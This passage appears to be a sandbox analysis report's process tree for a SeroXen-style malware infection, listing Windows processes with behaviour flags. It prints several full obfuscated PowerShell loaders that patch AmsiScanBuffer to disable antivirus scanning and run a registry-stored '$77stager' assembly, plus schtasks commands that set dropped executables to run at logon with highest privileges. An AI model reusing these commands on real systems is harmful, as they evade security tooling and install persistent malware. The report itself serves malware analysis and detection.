@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$XjFxxtTZuQA=$NjzmZAAkwDXxq.GetMethod('G'+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'uleHa'+[Char](110)+''+'d'+''+'l'+'e').Invoke($Null,@([Object]('ke'+'r'+''+'n'+'e'+[Char](108)+''+[Char](51)+'2.'+[Char](100)+''+'l'+''+[Char](108)+'')));$oJSZGHdkDsSpHq=$wXWVCLOwGUhVcH.Invoke($Null,@([Object]$XjFxxtTZuQA,[Object](''+'L'+''+[Char](111)+''+[Char](97)+'dL'+[Char](105)+''+[Char](98)+''+[Char](114)+'ar'+[Char](121)+''+[Char](65)+'')));$vHrpfSMndukxLikXD=$wXWVCLOwGUhVcH.Invoke($Null,@([Object]$XjFxxtTZuQA,[Object](''+[Char](86)+'i'+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+'t'+''+[Char](101)+''+'c'+''+[Char](116)+'')));$nQjXFIE=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oJSZGHdkDsSpHq,$gpKgblwCJZHQRJorNAm).Invoke('a'+'m'+''+'s'+'i'+'.'+'d'+'l'+'l');$bfWoVldWPYICLbpdL=$wXWVCLOwGUhVcH.Invoke($Null,@([Object]$nQjXFIE,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+'i'+''+[Char](83)+''+'c'+''+[Char](97)+''+[Char](110)+'B'+[Char](117)+''+[Char](102)+''+'f'+''+'e'+'r')));$hNqJMDyAUC=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vHrpfSMndukxLikXD,$FVenBIChVWekdhLrpiJiFC).Invoke($bfWoVldWPYICLbpdL,[uint32]8,4,[ref]$hNqJMDyAUC);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$bfWoVldWPYICLbpdL,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vHrpfSMndukxLikXD,$FVenBIChVWekdhLrpiJiFC).Invoke($bfWoVldWPYICLbpdL,[uint32]8,0x20,[ref]$hNqJMDyAUC);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+'7'+'s'+''+'t'+'ag'+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3556
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:paWRZWnyYWQf{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mLEtHzMGvFDUcE,[Parameter(Position=1)][Type]$vyZSduXuOv)$WlurpAcHJoO=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+'D'+''+[Char](101)+''+'l'+''+[Char](101)+'g'+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+'M'+[Char](101)+''+'m'+''+[Char](111)+'r'+[Char](121)+'Mo'+[Char](100)+''+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+'D'+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+[Char](84)+'y'+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'ic'+[Char](44)+''+'S'+''+'e'+'a'+[Char](108)+'ed'+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+'iC'+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+'u'+''+'t'+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+'s'+'',[MulticastDelegate]);$WlurpAcHJoO.DefineConstructor('R'+'T'+''+'S'+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+[Char](97)+''+'l'+''+'N'+'a'+'m'+''+[Char](101)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'eBy'+'S'+'i'+[Char](103)+''+','+'P'+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$mLEtHzMGvFDUcE).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+'t'+''+[Char](105)+'m'+'e'+''+[Char](44)+'M'+[Char](97)+''+'n'+''+[Char](97)+'ge'+'d'+'');$WlurpAcHJoO.DefineMethod(''+'I'+''+[Char](110)+'v'+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+'u'+'b'+''+[Char](108)+'i'+[Char](99)+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+',N'+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+'V'+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$vyZSduXuOv,$mLEtHzMGvFDUcE).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+'a'+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $WlurpAcHJoO.CreateType();}$HsibBDQjNmdgZ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+'s'+''+'o'+''+'f'+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](85)+''+'n'+''+[Char](115)+''+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+'t'+[Char](105)+''+'v'+''+[Char](101)+'Me'+[Char](116)+''+'h'+'od'+[Char](115)+'');$GXMpjTojLLWlZg=$HsibBDQjNmdgZ.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+'A'+[Char](100)+''+[Char](100)+''+'r'+''+'e'+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+'t'+[Char](97)+''+[Char](116)+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$wSTiMVKyYvuAaIvKCcb=paWRZWnyYWQf @([String])([IntPtr]);$lMGRbQEqdeUYQlRPqVCbEq=paWRZWnyYWQf @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$sadfHHLPdWa=$HsibBDQjNmdgZ.GetMethod('G'+'e'+''+'t'+''+'M'+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+''+[Char](72)+''+'a'+'n'+[Char](100)+''+'l'+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+'n'+'e'+'l'+''+[Char](51)+'2'+[Char](46)+''+'d'+'ll')));$ZZqMSwagQLbIwo=$GXMpjTojLLWlZg.Invoke($Null,@([Object]$sadfHHLPdWa,[Object](''+[Char](76)+''+[Char](111)+''+'a'+'d'+'L'+''+[Char](105)+'b'+'r'+''+[Char](97)+''+[Char](114)+'y'+[Char](65)+'')));$BvqkJcyrmMzWbbPqU=$GXMpjTojLLWlZg.Invoke($Null,@([Object]$sadfHHLPdWa,[Object](''+'V'+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+'al'+'P'+''+[Char](114)+''+'o'+''+'t'+''+[Char](101)+''+[Char](99)+''+'t'+'')));$XicCpLf=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZZqMSwagQLbIwo,$wSTiMVKyYvuAaIvKCcb).Invoke('a'+[Char](109)+'s'+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'');$vKfJOWkKMAOSPilNu=$GXMpjTojLLWlZg.Invoke($Null,@([Object]$XicCpLf,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+'i'+[Char](83)+''+'c'+''+[Char](97)+'n'+[Char](66)+''+'u'+'f'+[Char](102)+''+[Char](101)+''+'r'+'')));$gItzdDLMWy=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BvqkJcyrmMzWbbPqU,$lMGRbQEqdeUYQlRPqVCbEq).Invoke($vKfJOWkKMAOSPilNu,[uint32]8,4,[ref]$gItzdDLMWy);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$vKfJOWkKMAOSPilNu,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BvqkJcyrmMzWbbPqU,$lMGRbQEqdeUYQlRPqVCbEq).Invoke($vKfJOWkKMAOSPilNu,[uint32]8,0x20,[ref]$gItzdDLMWy);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'FTWA'+[Char](82)+''+'E'+'').GetValue('$77'+'s'+''+[Char](116)+''+[Char](97)+''+'g'+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:908 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3100
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:pTyMYVhjyUpr{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$aGmSFSUQvZkdMC,[Parameter(Position=1)][Type]$otyEQUFSjn)$VxZnuiOOiWn=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+'le'+[Char](99)+''+'t'+''+'e'+'d'+[Char](68)+''+'e'+'l'+[Char](101)+''+'g'+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+''+'y'+'M'+'o'+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'D'+[Char](101)+''+'l'+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+'e'+'T'+'y'+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+'i'+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+'led'+','+''+[Char](65)+''+'n'+''+[Char](115)+'i'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+'u'+'t'+'o'+''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$VxZnuiOOiWn.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+''+[Char](99)+'i'+'a'+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+'eB'+[Char](121)+''+[Char](83)+'i'+[Char](103)+','+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$aGmSFSUQvZkdMC).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+'e,Ma'+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$VxZnuiOOiWn.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+'e'+'By'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+'N'+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+''+','+'V'+[Char](105)+''+'r'+''+'t'+'u'+[Char](97)+'l',$otyEQUFSjn,$aGmSFSUQvZkdMC).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+'me'+','+'M'+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+'e'+'d'+'');Write-Output $VxZnuiOOiWn.CreateType();}$PuHZBmMarkXcQ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+'t'+''+[Char](101)+'m'+[Char](46)+''+'d'+''+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+'i'+'n'+''+'3'+''+[Char](50)+'.'+[Char](85)+''+[Char](110)+'sa'+'f'+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+''+'i'+'v'+[Char](101)+''+[Char](77)+''+'e'+'t'+[Char](104)+''+[Char](111)+''+'d'+''+[Char](115)+'');$rJDOzOsTBDlRxa=$PuHZBmMarkXcQ.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+'o'+''+'c'+'Ad'+'d'+'r'+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+',S'+[Char](116)+'at'+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$bTdBeeyoexzRkWTTAER=pTyMYVhjyUpr @([String])([IntPtr]);$KIrLQDQFWFoboRGBdkmIrN=pTyMYVhjyUpr @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$pAZwYVqiQXC=$PuHZBmMarkXcQ.GetMethod('G'+[Char](101)+'t'+[Char](77)+''+'o'+''+[Char](100)+'ul'+'e'+'Ha'+[Char](110)+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+''+'n'+''+'e'+''+[Char](108)+''+[Char](51)+'2'+'.'+''+[Char](100)+''+[Char](108)+'l')));$QDwIWoOyLkcsQq=$rJDOzOsTBDlRxa.Invoke($Null,@([Object]$pAZwYVqiQXC,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+'L'+'i'+''+'b'+'r'+[Char](97)+''+'r'+''+[Char](121)+''+[Char](65)+'')));$mryRhSLKEWmxoMTRw=$rJDOzOsTBDlRxa.Invoke($Null,@([Object]$pAZwYVqiQXC,[Object]('V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+'r'+[Char](111)+''+[Char](116)+'e'+[Char](99)+''+'t'+'')));$VcRdwYj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QDwIWoOyLkcsQq,$bTdBeeyoexzRkWTTAER).Invoke(''+[Char](97)+'m'+[Char](115)+''+[Char](105)+''+'.'+'dl'+[Char](108)+'');$RgmLSyZqTgScfQSbe=$rJDOzOsTBDlRxa.Invoke($Null,@([Object]$VcRdwYj,[Object](''+[Char](65)+''+[Char](109)+'s'+[Char](105)+''+[Char](83)+''+[Char](99)+'a'+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+'f'+'er')));$ZkIkogeJaN=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mryRhSLKEWmxoMTRw,$KIrLQDQFWFoboRGBdkmIrN).Invoke($RgmLSyZqTgScfQSbe,[uint32]8,4,[ref]$ZkIkogeJaN);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$RgmLSyZqTgScfQSbe,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mryRhSLKEWmxoMTRw,$KIrLQDQFWFoboRGBdkmIrN).Invoke($RgmLSyZqTgScfQSbe,[uint32]8,0x20,[ref]$ZkIkogeJaN);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+[Char](84)+'WA'+[Char](82)+''+'E'+'').GetValue('$'+[Char](55)+'7'+'s'+''+[Char](116)+''+[Char](97)+''+'g'+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
PID:3804 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:460
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1104
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1172
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1228
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1252
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1368
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:3060
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1384
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1416
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1504
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1520
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1660
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1704
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1716
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1812
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
- Modifies Internet Explorer settings
PID:1824 -
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004B8 0x00000000000004CC2⤵PID:3732
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1892
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1904
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1988
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2028
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1864
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2204
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2380
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2388
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
- Drops file in System32 directory
PID:2416
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2508
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2516
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2532
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2556
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2576
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2592
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2272
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2164
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3292 -
C:\Users\Admin\AppData\Local\Temp\Uni.exe"C:\Users\Admin\AppData\Local\Temp\Uni.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3584 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "SeroXen" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:4424
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4132 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "SeroXen" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
PID:2132
-
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"4⤵
- Executes dropped EXE
PID:2812
-
-
C:\Users\Admin\AppData\Local\Temp\tUCkOmZwRnsY.exe"C:\Users\Admin\AppData\Local\Temp\tUCkOmZwRnsY.exe"4⤵
- Executes dropped EXE
PID:656
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /delete /tn "SeroXen" /f4⤵PID:4800
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:4552
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QGt1lQ2ztLkj.bat" "4⤵PID:4672
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:4152
-
-
C:\Windows\SysWOW64\chcp.comchcp 650015⤵PID:1352
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost5⤵
- Runs ping.exe
PID:2104
-
-
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"4⤵
- Executes dropped EXE
PID:2156
-
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77Client.exe" /tr "'C:\Users\Admin\AppData\Roaming\SubDir\Client.exe'" /sc onlogon /rl HIGHEST4⤵
- Creates scheduled task(s)
PID:5104 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:2088
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"3⤵
- Executes dropped EXE
PID:4416
-
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77Uni.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Uni.exe'" /sc onlogon /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:2036
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default2⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2336 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x12c,0x130,0x134,0x108,0x138,0x7ffee7773cb8,0x7ffee7773cc8,0x7ffee7773cd83⤵PID:3340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1896,8918080595204330043,5303618292816187512,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1948 /prefetch:23⤵PID:1028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1896,8918080595204330043,5303618292816187512,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 /prefetch:33⤵PID:3488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1896,8918080595204330043,5303618292816187512,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2512 /prefetch:83⤵PID:2764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,8918080595204330043,5303618292816187512,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3184 /prefetch:13⤵PID:2280
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,8918080595204330043,5303618292816187512,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:13⤵PID:4592
-
-
